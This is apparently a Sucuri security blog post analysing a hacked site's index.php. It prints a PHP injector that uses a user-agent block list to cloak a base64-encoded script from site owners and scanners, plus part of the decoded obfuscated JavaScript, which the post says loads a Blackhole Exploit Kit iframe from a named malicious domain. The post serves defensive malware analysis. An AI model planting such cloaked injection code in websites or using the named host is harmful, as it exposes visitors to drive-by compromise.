(Sucuri.net) A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.
After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.
Once we got access to the site, we learned why. It had the following code on the index.php file:
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER[‘HTTP_USER_AGENT’];
$botsUA = array(‘12345′,’alexa.com’,’anonymouse.org’,’bdbrandprotect.com’,
‘blogpulse.com’,’bot’,’buzztracker.com’,’crawl’,’docomo’,’drupal.org’,
‘httpclient’,’internetseer.com’,’linux’,’macintosh’,’mac os’,’magent’,’mailru’,
‘netcraft’,’openacoon.de’,’opera mini’,’opera mobi’,’playstation’,
‘rssreader’,’slurp’,’snoopy’,’spider’,’spyder’
,’validator’,’virus’,’vlc media player’,’webcollage’,’wordpress’,’x11′,
‘iphone’,’android’, ‘firefox’);
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
echo(base64_decode(“PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0icmYzIi5zcGx.
Do you know what it does? It checks the user agent (aka browser) of the person visiting the site and only displays the malware if it does not contain the strings “Linux”, “Mac”, “Iphone”, “Firefox”, “Bot”, “Virus”, etc.
So if you are on a Mac, or Linux, or using Firefox, nothing would happen. However, when you go to the site using Windows and IE or Chrome, it would attempt to compromise your browser/computer.
This makes much harder for the owner of the site to detect the malware and take action to remove it. That’s why on our malware scanner, we use multiple Browsers, referrers, and user agents to try to catch any hidden malicious code. So just because you can’t see it, doesn’t mean it is not there 
Technical details
If you are curious about what that code above does after being decoded, it prints the following JavaScript to the bottom of the site:
<script>if(window.document)a=”rf3″.split(“5236”).pop+’qwe’;a=a[“spli”+”t”](“”).reverse()[“po”+”p”]();if(a==’f’||a==”\n”)
f=[5,5,101,98,28,36,96,107,95,113,105,97,106,112,42,99,97,112,65,104,97,105,97,
106,112,111,62,117,80,93,99,74,93,105,97,36,35,94,107,96,117,35,37,87,44,89,37,
119,5,5,5,101,98,110..
When this script read by the browser, it will create an iFrame to http://vvesek.freetcp.com/i/i.php?go=1 (and variations – these domains change often), where the actual Blackhole Exploit Kit code will come from.
Conclusion
This is just an example why sometimes users complain of malware when visiting a site, but the owner doesn’t see it. This may also lead to Sucuri scanner alerts and the owner can’t find the issue. If you have any questions, let us know.
Leave a reply
